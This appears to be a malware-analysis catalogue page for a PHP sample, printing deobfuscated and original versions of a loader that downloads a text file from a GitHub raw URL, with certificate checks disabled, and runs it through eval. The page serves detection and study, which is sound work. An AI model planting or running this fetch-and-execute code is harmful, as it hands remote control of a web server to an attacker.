PHP Malware Analysis

Back to list

Tags

URLs
https://raw.githubusercontent.com/tuyulmama/root/master/xd.txt
Execution
eval

Deobfuscated code

<?php

function get_contents($url)
{
    $ch = curl_init("{$url}");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $GLOBALS['coki']);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $GLOBALS['coki']);
    $result = curl_exec($ch);
    return $result;
}
$a = get_contents('https://raw.githubusercontent.com/tuyulmama/root/master/xd.txt');
eval('?>' . $a);


Original code

<?php
function get_contents($url){
  $ch = curl_init("$url");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
  $result = curl_exec($ch);
  return $result;
}

$a = get_contents('https://raw.githubusercontent.com/tuyulmama/root/master/xd.txt');
eval('?>'.$a);